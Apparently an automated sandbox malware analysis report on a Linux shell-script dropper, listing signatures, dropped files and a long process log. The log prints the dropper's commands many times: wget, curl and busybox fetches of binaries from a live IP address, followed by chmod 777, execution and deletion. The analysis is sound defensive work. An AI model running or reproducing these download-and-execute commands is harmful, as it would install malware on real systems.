Malware Analysis Report

2025-04-03 19:11

Sample ID 241121-htye8azkfs
Target 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
SHA256 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2

Threat Level: Shows suspicious behavior

The file 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 07:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 07:02

Reported

2024-11-21 07:04

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

35s

Max time network

129s

Command Line

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
N/A /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ N/A
N/A /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A
N/A /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 N/A
N/A /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 N/A
N/A /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc N/A
N/A /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a N/A
N/A /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe N/A
N/A /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 N/A
N/A /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne N/A
N/A /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz N/A
N/A /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ N/A
N/A /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG N/A
N/A /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo N/A
N/A /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw N/A
N/A /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 N/A
N/A /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ N/A
N/A /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /usr/bin/curl N/A
File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /usr/bin/curl N/A
File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /usr/bin/curl N/A
File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /usr/bin/curl N/A
File opened for modification /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a /usr/bin/curl N/A
File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /usr/bin/curl N/A
File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /usr/bin/curl N/A
File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /usr/bin/curl N/A
File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /usr/bin/curl N/A
File opened for modification /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /usr/bin/curl N/A
File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /usr/bin/curl N/A
File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /usr/bin/curl N/A
File opened for modification /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 /usr/bin/curl N/A
File opened for modification /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc /usr/bin/curl N/A
File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /usr/bin/curl N/A
File opened for modification /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ /usr/bin/curl N/A
File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /usr/bin/curl N/A
File opened for modification /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ /usr/bin/curl N/A
File opened for modification /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz /usr/bin/curl N/A
File opened for modification /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 /usr/bin/curl N/A
File opened for modification /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe /usr/bin/curl N/A
File opened for modification /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne /usr/bin/curl N/A
File opened for modification /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 /usr/bin/curl N/A
File opened for modification /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO /usr/bin/curl N/A
File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /usr/bin/curl N/A
File opened for modification /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo /usr/bin/curl N/A
File opened for modification /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw /usr/bin/curl N/A
File opened for modification /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG /usr/bin/curl N/A

Processes

/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh

[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/chmod

[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/rm

[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/wget

[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/chmod

[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe

[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/rm

[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/wget

[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/chmod

[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz

[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/rm

[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/wget

[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/chmod

[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne

[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/rm

[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/wget

[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/chmod

[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo

[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/rm

[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/wget

[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/chmod

[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw

[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/rm

[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/wget

[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/chmod

[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8

[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/rm

[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/wget

[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/chmod

[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ

[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/rm

[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/chmod

[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/rm

[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/wget

[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/chmod

[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ

[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/rm

[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/chmod

[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG

[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/rm

[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/wget

[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/chmod

[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc

[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/rm

[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/wget

[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/chmod

[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/rm

[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/wget

[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/chmod

[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6

[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/rm

[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/wget

[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/chmod

[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6

[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/bin/rm

[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]

/usr/bin/wget

[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/chmod

[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc

[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/bin/rm

[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]

/usr/bin/wget

[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/chmod

[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a

[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/bin/rm

[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]

/usr/bin/wget

[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/chmod

[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe

[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/bin/rm

[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]

/usr/bin/wget

[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/chmod

[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/bin/rm

[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]

/usr/bin/wget

[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/chmod

[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne

[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/bin/rm

[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]

/usr/bin/wget

[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/chmod

[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz

[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/bin/rm

[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]

/usr/bin/wget

[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/chmod

[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ

[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/bin/rm

[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/chmod

[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG

[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/bin/rm

[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]

/usr/bin/wget

[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/chmod

[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo

[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/bin/rm

[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]

/usr/bin/wget

[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/chmod

[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw

[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/bin/rm

[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]

/usr/bin/wget

[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/chmod

[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8

[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/bin/rm

[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]

/usr/bin/wget

[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/chmod

[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ

[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/bin/rm

[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]

/bin/busybox

